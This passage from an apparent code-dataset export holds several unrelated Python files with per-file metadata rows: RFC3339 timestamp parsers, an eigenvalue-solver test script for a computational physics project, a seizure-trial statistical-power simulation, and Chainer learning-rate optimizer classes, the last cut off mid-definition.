parts = string.split(".")
# it's possible that the time does not have a fractional component
# e.g 2015-08-03T09:12:43Z, in this case 'parts' will only have a
# single element that should end in Z. Strip the Z if it exists
# so we can use the same format string for processing the main
# date+time regardless of whether the time has a fractional component.
if parts[0].endswith("Z"):
parts[0] = parts[0][:-1]
# create a datetime object
try:
tm = time.strptime(parts[0], "%Y-%m-%dT%H:%M:%S")
except ValueError:
return None
dt = datetime.datetime(*(tm[0:6]))
# now add the fractional part
if len(parts) > 1:
fractions = parts[1]
# if we had a fractional component it should terminate in a Z
if not fractions.endswith("Z"):
# we don't handle non UTC timezones yet
if any(c in fractions for c in "+-"):
return None
return dt
# remove the Z and just process the fraction.
fractions = fractions[:-1]
to_micros = 6 - len(fractions)
micro = int(int(fractions) * 10 ** to_micros)
dt = dt.replace(microsecond=micro)
return dt
def _rfc3339_to_datetime_regex(string):
# type: (str) -> Optional[datetime.datetime]
"""
rfc3339_to_datetime variation which utilizes regex approach.
"""
# split the string in to main time and fractional component
parts = string.split(".")
# it's possible that the time does not have a fractional component
# e.g 2015-08-03T09:12:43Z, in this case 'parts' will only have a
# single element that should end in Z. Strip the Z if it exists
# so we can use the same format string for processing the main
# date+time regardless of whether the time has a fractional component.
if parts[0].endswith("Z"):
parts[0] = parts[0][:-1]
# create a datetime object
try:
dt = datetime.datetime(
*list(map(int, RFC3339_STR_REGEX.match(parts[0]).groups())) # type: ignore
)
except Exception:
return None
# now add the fractional part
if len(parts) > 1:
fractions = parts[1]
# if we had a fractional component it should terminate in a Z
if not fractions.endswith("Z"):
# we don't handle non UTC timezones yet
if any(c in fractions for c in "+-"):
return None
return dt
# remove the Z and just process the fraction.
fractions = fractions[:-1]
to_micros = 6 - len(fractions)
micro = int(int(fractions) * 10 ** to_micros)
dt = dt.replace(microsecond=micro)
return dt
def _rfc3339_to_datetime_string_split(string):
# type: (str) -> Optional[datetime.datetime]
"""
rfc3339_to_datetime variation which utilizes string.split approach.
Returns a date time from a rfc3339 formatted timestamp.
This doesn't do any complex testing and assumes the string is well formed and in UTC (e.g.
uses Z at the end rather than a time offset).
@param string: a date/time in rfc3339 format, e.g. 2015-08-03T09:12:43.143757463Z
@rtype datetime.datetime
"""
# split the string in to main time and fractional component
parts = string.split(".")
# it's possible that the time does not have a fractional component
# e.g 2015-08-03T09:12:43Z, in this case 'parts' will only have a
# single element that should end in Z. Strip the Z if it exists
# so we can use the same format string for processing the main
# date+time regardless of whether the time has a fractional component.
if parts[0].endswith("Z"):
parts[0] = parts[0][:-1]
# create a datetime object
try:
date_parts, time_parts = parts[0].split("T")
date_parts = date_parts.split("-") # type: ignore
time_parts = time_parts.split(":") # type: ignore
dt = datetime.datetime(
int(date_parts[0]),
int(date_parts[1]),
int(date_parts[2]),
int(time_parts[0]),
int(time_parts[1]),
int(time_parts[2]),
)
except Exception:
return None
# now add the fractional part
if len(parts) > 1:
fractions = parts[1]
# if we had a fractional component it should terminate in a Z
if not fractions.endswith("Z"):
# we don't handle non UTC timezones yet
if any(c in fractions for c in "+-"):
return None
return dt
# remove the Z and just process the fraction.
fractions = fractions[:-1]
to_micros = 6 - len(fractions)
micro = int(int(fractions) * 10 ** to_micros)
dt = dt.replace(microsecond=micro)
return dt
def _rfc3339_to_datetime_udatetime(string):
# type: (str) -> Optional[datetime.datetime]
"""
rfc3339_to_datetime variation which utilizes udatetime library.
"""
# split the string in to main time and fractional component
parts = string.split(".")
# it's possible that the time does not have a fractional component
# e.g 2015-08-03T09:12:43Z, in this case 'parts' will only have a
# single element that should end in Z. Strip the Z if it exists
# so we can use the same format string for processing the main
# date+time regardless of whether the time has a fractional component.
if parts[0].endswith("Z"):
parts[0] = parts[0][:-1]
# create a datetime object
try:
dt = udatetime.from_string(parts[0])
# NOTE: At this point we don't support timezones
dt = dt.replace(tzinfo=None)
except ValueError:
return None
# now add the fractional part
if len(parts) > 1:
fractions = parts[1]
# if we had a fractional component it should terminate in a Z
if not fractions.endswith("Z"):
# we don't handle non UTC timezones yet
if any(c in fractions for c in "+-"):
return None
return dt
# remove the Z and just process the fraction.
fractions = fractions[:-1]
to_micros = 6 - len(fractions)
micro = int(int(fractions) * 10 ** to_micros)
# NOTE(Tomaz): dt.replace is quite slow...
dt = dt.replace(microsecond=micro)
return dt
if udatetime:
rfc3339_to_nanoseconds_since_epoch = _rfc3339_to_nanoseconds_since_epoch_udatetime
rfc3339_to_datetime = _rfc3339_to_datetime_udatetime
else:
rfc3339_to_nanoseconds_since_epoch = (
_rfc3339_to_nanoseconds_since_epoch_string_split
)
rfc3339_to_datetime = _rfc3339_to_datetime_string_split

avg_line_length: 33.878788
max_line_length: 98
alphanum_fraction: 0.639279
qsc_*_quality_signal columns (41 values, schema order, qsc_code_num_words_quality_signal through qsc_codepython_frac_lines_print_quality_signal):
2,253 | 15,652 | 4.366178 | 0.118509 | 0.021958 | 0.040663 | 0.030497 | 0.861442 | 0.85768 | 0.84172 | 0.825557 | 0.822507 | 0.822507 | 0 | 0.040263 | 0.271659 | 15,652 | 461 | 99 | 33.952278 | 0.822632 | 0.474636 | 0 | 0.803653 | 0 | 0.009132 | 0.021934 | 0.011849 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03653 | false | 0 | 0.050228 | 0 | 0.232877 | 0
qsc_* columns without the _quality_signal suffix (41 values, same order, qsc_code_num_words through qsc_codepython_frac_lines_print):
0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
effective: 0
hits: 7

Row 5
hexsha: 22d3fd034b9ac746f36c5674edb936cb7063e9f0
size: 11,274
ext: py
lang: Python
max_stars_repo_path: Projects/Project2/src/testing.py
max_stars_repo_name: robolux/Computational_Physics
max_stars_repo_head_hexsha: 46ca9f4234d614f5e5ad2717df3ad074eb2d60ca
max_stars_repo_licenses: ["MIT"]
max_stars_count: null
max_stars_repo_stars_event_min_datetime: null
max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: Projects/Project2/src/testing.py
max_issues_repo_name: robolux/Computational_Physics
max_issues_repo_head_hexsha: 46ca9f4234d614f5e5ad2717df3ad074eb2d60ca
max_issues_repo_licenses: ["MIT"]
max_issues_count: null
max_issues_repo_issues_event_min_datetime: null
max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: Projects/Project2/src/testing.py
max_forks_repo_name: robolux/Computational_Physics
max_forks_repo_head_hexsha: 46ca9f4234d614f5e5ad2717df3ad074eb2d60ca
max_forks_repo_licenses: ["MIT"]
max_forks_count: null
max_forks_repo_forks_event_min_datetime: null
max_forks_repo_forks_event_max_datetime: null
content:
# Project 1 Testing - Computational Physics
# Hunter Phillips
import sys
import os.path
import numpy as nmp
from main import *
save_path = '../results'
# part b
case = 1
for w, g in enumerate(['1', '5'], 1):
for w2, g2 in enumerate(['4', '16', '64', '128'], 1):
for w3, g3 in enumerate(['2', '6', '12'], 1):
save_path = '../results/partb'
filename = os.path.join(save_path, "case" + str(case) + ".txt")
print(filename)
case = case + 1
with open (filename, 'w') as f_m: # with auto closes files which is helpful here
n_i = int(g2)
o_i = float(g)
p_i = int(g3)
t_i = 1e-10
iterations, tol, sorted_eigs, eig_compare, A, general_time, eig_compare2 = solve_low(n_i, 0, o_i, p_i, t_i)
f_m.write('\n\n' + '*'.__mul__(16)+'\n')
f_m.write('Part B'+'\n')
f_m.write('*'.__mul__(16) + '\n'+'\n')
f_m.write("Solution for Part B with n = %d, omega = %d, and rho max = %d took %g seconds\n" % (n_i, o_i, p_i, general_time))
f_m.write("Reached specified tolerance of (%.00E) in %g iterations\n" % (tol, iterations))
f_m.write("This translates to %.2f iterations/element\n" % (iterations/float(n_i**2)))
f_m.write('\nPart B Sol numpy .eig numpy .eigh\n*****************************************\n')
eig_num = [1.0]
for m in range(0, n_i):
eig_num.append(sorted_eigs[m][0])
eig_num.append(eig_compare[0][m])
eig_num.append(eig_compare2[0][m])
eig_num.pop(0) # could restart index instead, quick fix for right now
# this checks if eig has put the values in decending order
# and fixes the ordering if this is the case
# if the values are genuinally different without regard to order
# the test will still fail
rev_back = -2
trash_pass = [1.0]
rev_for = 1
dummy2 = 0
eig_num_dummy = nmp.copy(eig_num)
for h in range(0, nmp.size(eig_num_dummy)/3):
dummy2 = eig_num_dummy[nmp.size(eig_num_dummy)+rev_back]
trash_pass.append(dummy2)
rev_back = rev_back - 3
rev_for = rev_for + 3
trash_pass.pop(0)
trash_sorted = nmp.sort(trash_pass)
rev_back = -2
rev_for = 1
for h in range(0, nmp.size(eig_num_dummy)/3):
eig_num[rev_for] = trash_sorted[h]
rev_back = rev_back - 3
rev_for = rev_for + 3
counter = 0
for n in eig_num:
if counter == 0:
f_m.write('%.12s' % ('%.10f' % n))
f_m.write(' ')
counter = 1
elif counter == 1:
f_m.write('%.12s' % ('%.10f' % n))
f_m.write(' ')
counter = 2
elif counter == 2:
f_m.write('%.12s' % ('%.10f' % n))
f_m.write('\n')
counter = 0
Pass_bool = False
for h in range(0,nmp.size(eig_num)/3):
if nmp.round(eig_num[0], 8) == nmp.round(eig_num[1], 8) == nmp.round(eig_num[2], 8):
Pass_bool = True
else:
Pass_bool = False
del eig_num[0:3]
if Pass_bool == True:
f_m.write('The Unit Tests have PASSED')
elif Pass_bool == False:
f_m.write('The Unit Tests have FAILED')
# Part D
case = 1
for w, g in enumerate(['1', '3', '7', '11'], 1):
for w2, g2 in enumerate(['4', '16', '64', '128'], 1):
for w3, g3 in enumerate(['2', '6', '36', '128'], 1): # make pmax higher to determine stability
save_path = '../results/partd'
filename = os.path.join(save_path, "case" + str(case) + ".txt")
print(filename)
case = case + 1
with open (filename, 'w') as f_m: # with auto closes files which is helpful here
n_i = int(g2)
o_i = float(g)
p_i = int(g3)
t_i = 1e-10
iterations, tol, sorted_eigs, eig_compare, A, general_time, eig_compare2 = solve_low(n_i, 2, o_i, p_i, t_i)
f_m.write('\n\n' + '*'.__mul__(16)+'\n')
f_m.write('Part D'+'\n')
f_m.write('*'.__mul__(16) + '\n'+'\n')
f_m.write("Solution for Part D with n = %d, omega = %d, and rho max = %d took %g seconds\n" % (n_i, o_i, p_i, general_time))
f_m.write("Reached specified tolerance of (%.00E) in %g iterations\n" % (tol, iterations))
f_m.write("This translates to %.2f iterations/element\n" % (iterations/float(n_i**2)))
f_m.write('\nPart D Sol numpy .eig numpy .eigh\n*****************************************\n')
eig_num = [1.0]
for m in range(0, n_i):
eig_num.append(sorted_eigs[m][0])
eig_num.append(eig_compare[0][m])
eig_num.append(eig_compare2[0][m])
eig_num.pop(0) # could restart index instead, quick fix for right now
rev_back = -2
trash_pass = [1.0]
rev_for = 1
dummy2 = 0
eig_num_dummy = nmp.copy(eig_num)
for h in range(0, nmp.size(eig_num_dummy)/3):
dummy2 = eig_num_dummy[nmp.size(eig_num_dummy)+rev_back]
trash_pass.append(dummy2)
rev_back = rev_back - 3
rev_for = rev_for + 3
trash_pass.pop(0)
trash_sorted = nmp.sort(trash_pass)
rev_back = -2
rev_for = 1
for h in range(0, nmp.size(eig_num_dummy)/3):
eig_num[rev_for] = trash_sorted[h]
rev_back = rev_back - 3
rev_for = rev_for + 3
counter = 0
for n in eig_num:
if counter == 0:
f_m.write('%.12s' % ('%.10f' % n))
f_m.write(' ')
counter = 1
elif counter == 1:
f_m.write('%.12s' % ('%.10f' % n))
f_m.write(' ')
counter = 2
elif counter == 2:
f_m.write('%.12s' % ('%.10f' % n))
f_m.write('\n')
counter = 0
Pass_bool = False
for h in range(0,nmp.size(eig_num)/3):
if nmp.round(eig_num[0], 8) == nmp.round(eig_num[1], 8) == nmp.round(eig_num[2], 8):
Pass_bool = True
else:
Pass_bool = False
del eig_num[0:3]
if Pass_bool == True:
f_m.write('The Unit Tests have PASSED')
elif Pass_bool == False:
f_m.write('The Unit Tests have FAILED')
# Part E
case = 1
for w, g in enumerate(['0.01', '0.5', '1.0', '5.0'], 1):
for w2, g2 in enumerate(['4', '16', '64', '128'], 1):
for w3, g3 in enumerate(['2', '6', '36', '128'], 1): # make pmax higher to determine stability
save_path = '../results/parte'
filename = os.path.join(save_path, "case" + str(case) + ".txt")
print(filename)
case = case + 1
with open (filename, 'w') as f_m: # with auto closes files which is helpful here
n_i = int(g2)
o_i = float(g)
p_i = int(g3)
t_i = 1e-10
iterations, tol, sorted_eigs, eig_compare, A, general_time, eig_compare2 = solve_low(n_i, 1, o_i, p_i, t_i)
f_m.write('\n\n' + '*'.__mul__(16)+'\n')
f_m.write('Part E'+'\n')
f_m.write('*'.__mul__(16) + '\n'+'\n')
f_m.write("Solution for Part E with n = %d, omega = %d, and rho max = %d took %g seconds\n" % (n_i, o_i, p_i, general_time))
f_m.write("Reached specified tolerance of (%.00E) in %g iterations\n" % (tol, iterations))
f_m.write("This translates to %.2f iterations/element\n" % (iterations/float(n_i**2)))
f_m.write('\nPart E Sol w' + str(w) + ' numpy .eig numpy .eigh\n********************************************')
eig_num = [1.0]
for m in range(0, n_i):
eig_num.append(sorted_eigs[m][0])
eig_num.append(eig_compare[0][m])
eig_num.append(eig_compare2[0][m])
eig_num.pop(0) # could restart index instead, quick fix for right now
rev_back = -2
trash_pass = [1.0]
rev_for = 1
dummy2 = 0
eig_num_dummy = nmp.copy(eig_num)
for h in range(0, nmp.size(eig_num_dummy)/3):
dummy2 = eig_num_dummy[nmp.size(eig_num_dummy)+rev_back]
trash_pass.append(dummy2)
rev_back = rev_back - 3
rev_for = rev_for + 3
trash_pass.pop(0)
trash_sorted = nmp.sort(trash_pass)
rev_back = -2
rev_for = 1
for h in range(0, nmp.size(eig_num_dummy)/3):
eig_num[rev_for] = trash_sorted[h]
rev_back = rev_back - 3
rev_for = rev_for + 3
f_m.write('\n')
counter = 0
for n in eig_num:
if counter == 0:
f_m.write('%.12s' % ('%.10f' % n))
f_m.write(' ')
counter = 1
elif counter == 1:
f_m.write('%.12s' % ('%.10f' % n))
f_m.write(' ')
counter = 2
elif counter == 2:
f_m.write('%.12s' % ('%.10f' % n))
f_m.write('\n')
counter = 0
Pass_bool = False
for h in range(0,nmp.size(eig_num)/3):
if nmp.round(eig_num[0], 8) == nmp.round(eig_num[1], 8) == nmp.round(eig_num[2], 8):
Pass_bool = True
else:
Pass_bool = False
del eig_num[0:3]
if Pass_bool == True:
f_m.write('The Unit Tests have PASSED')
elif Pass_bool == False:
f_m.write('The Unit Tests have FAILED')
f_m.write('\n\n')

avg_line_length: 44.039063
max_line_length: 140
alphanum_fraction: 0.437289
qsc_*_quality_signal columns (41 values, schema order, qsc_code_num_words_quality_signal through qsc_codepython_frac_lines_print_quality_signal):
1,455 | 11,274 | 3.188316 | 0.116838 | 0.069843 | 0.07092 | 0.031041 | 0.926277 | 0.920673 | 0.918948 | 0.914421 | 0.904936 | 0.904936 | 0 | 0.046588 | 0.430726 | 11,274 | 255 | 141 | 44.211765 | 0.676223 | 0.056768 | 0 | 0.884793 | 0 | 0.013825 | 0.120855 | 0.014224 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.138249 | 0.018433 | 0 | 0.018433 | 0.013825
qsc_* columns without the _quality_signal suffix (41 values, same order, qsc_code_num_words through qsc_codepython_frac_lines_print):
0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0
effective: 0
hits: 8

Row 6
hexsha: a3ba3957ee6fb2252783fd0cdc5aaca1c6550300
size: 11,719
ext: py
lang: Python
max_stars_repo_path: utility_code/empirical_estimation.py
max_stars_repo_name: GoldenholzLab/rct-SNR
max_stars_repo_head_hexsha: d5d2268585add08f80cef883e6cd11443f0f7349
max_stars_repo_licenses: ["MIT"]
max_stars_count: null
max_stars_repo_stars_event_min_datetime: null
max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: utility_code/empirical_estimation.py
max_issues_repo_name: GoldenholzLab/rct-SNR
max_issues_repo_head_hexsha: d5d2268585add08f80cef883e6cd11443f0f7349
max_issues_repo_licenses: ["MIT"]
max_issues_count: null
max_issues_repo_issues_event_min_datetime: null
max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: utility_code/empirical_estimation.py
max_forks_repo_name: GoldenholzLab/rct-SNR
max_forks_repo_head_hexsha: d5d2268585add08f80cef883e6cd11443f0f7349
max_forks_repo_licenses: ["MIT"]
max_forks_count: null
max_forks_repo_forks_event_min_datetime: null
max_forks_repo_forks_event_max_datetime: null
content:
import numpy as np
#import time
from .patient_population_generation import randomly_select_theo_patient_pop
from .patient_population_generation import generate_theo_patient_pop_params
from .patient_population_generation import generate_heterogeneous_placebo_arm_patient_pop
from .patient_population_generation import generate_heterogeneous_drug_arm_patient_pop
from .endpoint_functions import calculate_percent_changes
from .endpoint_functions import calculate_time_to_prerandomizations
from .endpoint_functions import calculate_fisher_exact_p_value
from .endpoint_functions import calculate_Mann_Whitney_U_p_value
from .endpoint_functions import calculate_logrank_p_value
def empirically_estimate_RR50_statistical_power(theo_placebo_arm_patient_pop_params,
theo_drug_arm_patient_pop_params,
num_theo_patients_per_trial_arm,
num_baseline_months,
num_testing_months,
minimum_required_baseline_seizure_count,
placebo_mu,
placebo_sigma,
drug_mu,
drug_sigma,
num_trials):
RR50_p_values = np.zeros(num_trials)
baseline_time_scaling_const = 1
testing_time_scaling_const = 1
for trial_index in range(num_trials):
[placebo_arm_baseline_seizure_diaries,
placebo_arm_testing_seizure_diaries ] = \
generate_heterogeneous_placebo_arm_patient_pop(num_theo_patients_per_trial_arm,
theo_placebo_arm_patient_pop_params,
num_baseline_months,
num_testing_months,
baseline_time_scaling_const,
testing_time_scaling_const,
minimum_required_baseline_seizure_count,
placebo_mu,
placebo_sigma)
[drug_arm_baseline_seizure_diaries,
drug_arm_testing_seizure_diaries ] = \
generate_heterogeneous_drug_arm_patient_pop(num_theo_patients_per_trial_arm,
theo_drug_arm_patient_pop_params,
num_baseline_months,
num_testing_months,
baseline_time_scaling_const,
testing_time_scaling_const,
minimum_required_baseline_seizure_count,
placebo_mu,
placebo_sigma,
drug_mu,
drug_sigma)
placebo_arm_percent_changes = \
calculate_percent_changes(placebo_arm_baseline_seizure_diaries,
placebo_arm_testing_seizure_diaries)
drug_arm_percent_changes = \
calculate_percent_changes(drug_arm_baseline_seizure_diaries,
drug_arm_testing_seizure_diaries)
RR50_p_value = \
calculate_fisher_exact_p_value(placebo_arm_percent_changes,
drug_arm_percent_changes)
RR50_p_values[trial_index] = RR50_p_value
RR50_emp_stat_power = np.sum(RR50_p_values < 0.05)/num_trials
return RR50_emp_stat_power
def empirically_estimate_MPC_statistical_power(theo_placebo_arm_patient_pop_params,
theo_drug_arm_patient_pop_params,
num_theo_patients_per_trial_arm,
num_baseline_months,
num_testing_months,
minimum_required_baseline_seizure_count,
placebo_mu,
placebo_sigma,
drug_mu,
drug_sigma,
num_trials):
MPC_p_values = np.zeros(num_trials)
baseline_time_scaling_const = 1
testing_time_scaling_const = 1
for trial_index in range(num_trials):
[placebo_arm_baseline_seizure_diaries,
placebo_arm_testing_seizure_diaries ] = \
generate_heterogeneous_placebo_arm_patient_pop(num_theo_patients_per_trial_arm,
theo_placebo_arm_patient_pop_params,
num_baseline_months,
num_testing_months,
baseline_time_scaling_const,
testing_time_scaling_const,
minimum_required_baseline_seizure_count,
placebo_mu,
placebo_sigma)
[drug_arm_baseline_seizure_diaries,
drug_arm_testing_seizure_diaries ] = \
generate_heterogeneous_drug_arm_patient_pop(num_theo_patients_per_trial_arm,
theo_drug_arm_patient_pop_params,
num_baseline_months,
num_testing_months,
baseline_time_scaling_const,
testing_time_scaling_const,
minimum_required_baseline_seizure_count,
placebo_mu,
placebo_sigma,
drug_mu,
drug_sigma)
placebo_arm_percent_changes = \
calculate_percent_changes(placebo_arm_baseline_seizure_diaries,
placebo_arm_testing_seizure_diaries)
drug_arm_percent_changes = \
calculate_percent_changes(drug_arm_baseline_seizure_diaries,
drug_arm_testing_seizure_diaries)
MPC_p_value = \
calculate_Mann_Whitney_U_p_value(placebo_arm_percent_changes,
drug_arm_percent_changes)
MPC_p_values[trial_index] = MPC_p_value
MPC_emp_stat_power = np.sum(MPC_p_values < 0.05)/num_trials
return MPC_emp_stat_power
def empirically_estimate_TTP_statistical_power(theo_placebo_arm_patient_pop_params,
theo_drug_arm_patient_pop_params,
num_theo_patients_per_trial_arm,
num_baseline_months,
num_testing_months,
minimum_required_baseline_seizure_count,
placebo_mu,
placebo_sigma,
drug_mu,
drug_sigma,
num_trials):
TTP_p_values = np.zeros(num_trials)
baseline_time_scaling_const = 1
testing_time_scaling_const = 28
num_testing_days = num_testing_months*testing_time_scaling_const
for trial_index in range(num_trials):
[placebo_arm_monthly_baseline_seizure_diaries,
placebo_arm_daily_testing_seizure_diaries ] = \
generate_heterogeneous_placebo_arm_patient_pop(num_theo_patients_per_trial_arm,
theo_placebo_arm_patient_pop_params,
num_baseline_months,
num_testing_months,
baseline_time_scaling_const,
testing_time_scaling_const,
minimum_required_baseline_seizure_count,
placebo_mu,
placebo_sigma)
[drug_arm_monthly_baseline_seizure_diaries,
drug_arm_daily_testing_seizure_diaries ] = \
generate_heterogeneous_drug_arm_patient_pop(num_theo_patients_per_trial_arm,
theo_drug_arm_patient_pop_params,
num_baseline_months,
num_testing_months,
baseline_time_scaling_const,
testing_time_scaling_const,
minimum_required_baseline_seizure_count,
placebo_mu,
placebo_sigma,
drug_mu,
drug_sigma)
[placebo_arm_TTP_times, placebo_arm_observed_array] = \
calculate_time_to_prerandomizations(placebo_arm_monthly_baseline_seizure_diaries,
placebo_arm_daily_testing_seizure_diaries,
num_theo_patients_per_trial_arm,
num_testing_days)
[drug_arm_TTP_times, drug_arm_observed_array] = \
calculate_time_to_prerandomizations(drug_arm_monthly_baseline_seizure_diaries,
drug_arm_daily_testing_seizure_diaries,
num_theo_patients_per_trial_arm,
num_testing_days)
TTP_p_value = \
calculate_logrank_p_value(placebo_arm_TTP_times,
placebo_arm_observed_array,
drug_arm_TTP_times,
drug_arm_observed_array)
TTP_p_values[trial_index] = TTP_p_value
TTP_emp_stat_power = np.sum(TTP_p_values < 0.05)/num_trials
return TTP_emp_stat_power

avg_line_length: 56.07177
max_line_length: 99
alphanum_fraction: 0.461899
qsc_*_quality_signal columns (41 values, schema order, qsc_code_num_words_quality_signal through qsc_codepython_frac_lines_print_quality_signal):
897 | 11,719 | 5.347826 | 0.088071 | 0.062539 | 0.054201 | 0.04753 | 0.918491 | 0.871169 | 0.844486 | 0.783198 | 0.730665 | 0.72462 | 0 | 0.00564 | 0.515829 | 11,719 | 208 | 100 | 56.341346 | 0.839796 | 0.000939 | 0 | 0.729412 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.017647 | false | 0 | 0.058824 | 0 | 0.094118 | 0
qsc_* columns without the _quality_signal suffix (41 values, same order, qsc_code_num_words through qsc_codepython_frac_lines_print):
0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
effective: 0
hits: 9

Row 7
hexsha: a3d603c4ba585bb37a6d0da15a7eb5e707babc16
size: 22,560
ext: py
lang: Python
max_stars_repo_path: nutszebra_optimizer.py
max_stars_repo_name: nutszebra/stochastic_depth
max_stars_repo_head_hexsha: 8c63cbbb9964f976c52eb0d55e94cbdda22e733e
max_stars_repo_licenses: ["MIT"]
max_stars_count: 1
max_stars_repo_stars_event_min_datetime: 2017-01-06T13:16:17.000Z
max_stars_repo_stars_event_max_datetime: 2017-01-06T13:16:17.000Z
max_issues_repo_path: nutszebra_optimizer.py
max_issues_repo_name: nutszebra/stochastic_depth
max_issues_repo_head_hexsha: 8c63cbbb9964f976c52eb0d55e94cbdda22e733e
max_issues_repo_licenses: ["MIT"]
max_issues_count: null
max_issues_repo_issues_event_min_datetime: null
max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: nutszebra_optimizer.py
max_forks_repo_name: nutszebra/stochastic_depth
max_forks_repo_head_hexsha: 8c63cbbb9964f976c52eb0d55e94cbdda22e733e
max_forks_repo_licenses: ["MIT"]
max_forks_count: null
max_forks_repo_forks_event_min_datetime: null
max_forks_repo_forks_event_max_datetime: null
content:
import six
import chainer
from chainer import optimizers
import nutszebra_basic_print
class Optimizer(object):
def __init__(self, model=None):
self.model = model
self.optimizer = None
def __call__(self, i):
pass
def update(self):
self.optimizer.update()
class OptimizerResnet(Optimizer):
def __init__(self, model=None, schedule=(int(32000. / (50000. / 128)), int(48000. / (50000. / 128))), lr=0.1, momentum=0.9, weight_decay=1.0e-4, warm_up_lr=0.01):
super(OptimizerResnet, self).__init__(model)
optimizer = optimizers.MomentumSGD(warm_up_lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.schedule = schedule
self.lr = lr
self.warmup_lr = warm_up_lr
self.momentum = momentum
self.weight_decay = weight_decay
def __call__(self, i):
if i == 1:
lr = self.lr
print('finishded warming up')
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
if i in self.schedule:
lr = self.optimizer.lr / 10
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerDense(Optimizer):
def __init__(self, model=None, schedule=(150, 225), lr=0.1, momentum=0.9, weight_decay=1.0e-4):
super(OptimizerDense, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.schedule = schedule
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
def __call__(self, i):
if i in self.schedule:
lr = self.optimizer.lr / 10
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerWideRes(Optimizer):
def __init__(self, model=None, schedule=(60, 120, 160), lr=0.1, momentum=0.9, weight_decay=5.0e-4):
super(OptimizerWideRes, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.schedule = schedule
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
def __call__(self, i):
if i in self.schedule:
lr = self.optimizer.lr * 0.2
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerSwapout(Optimizer):
def __init__(self, model=None, schedule=(196, 224), lr=0.1, momentum=0.9, weight_decay=1.0e-4):
super(OptimizerSwapout, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.schedule = schedule
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
def __call__(self, i):
if i in self.schedule:
lr = self.optimizer.lr / 10
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerXception(Optimizer):
def __init__(self, model=None, lr=0.045, momentum=0.9, weight_decay=1.0e-5, period=2):
super(OptimizerXception, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
self.period = int(period)
def __call__(self, i):
if i % self.period == 0:
lr = self.optimizer.lr * 0.94
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerVGG(Optimizer):
def __init__(self, model=None, lr=0.01, momentum=0.9, weight_decay=5.0e-4):
super(OptimizerVGG, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
def __call__(self, i):
# 150 epoch means (0.94 ** 75) * lr
# if lr is 0.01, then (0.94 ** 75) * 0.01 is 0.0001 at the end
if i % 2 == 0:
lr = self.optimizer.lr * 0.94
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerGooglenet(Optimizer):
def __init__(self, model=None, lr=0.0015, momentum=0.9, weight_decay=2.0e-4):
super(OptimizerGooglenet, self).__init__(model)
optimizer = optimizers.MomentumSGD(lr, momentum)
weight_decay = chainer.optimizer.WeightDecay(weight_decay)
optimizer.setup(self.model)
optimizer.add_hook(weight_decay)
self.optimizer = optimizer
self.lr = lr
self.momentum = momentum
self.weight_decay = weight_decay
def __call__(self, i):
if i % 8 == 0:
lr = self.optimizer.lr * 0.96
print('lr is changed: {} -> {}'.format(self.optimizer.lr, lr))
self.optimizer.lr = lr
class OptimizerNetworkInNetwork(Optimizer):
def __init__(self, model=None, lr=0.1, momentum=0.9, weight_decay=1.0e-4, schedule=(int(1.0e5 / (50000. / 128)), )):
super(OptimizerNetworkInNetwork, self).__init__(model)
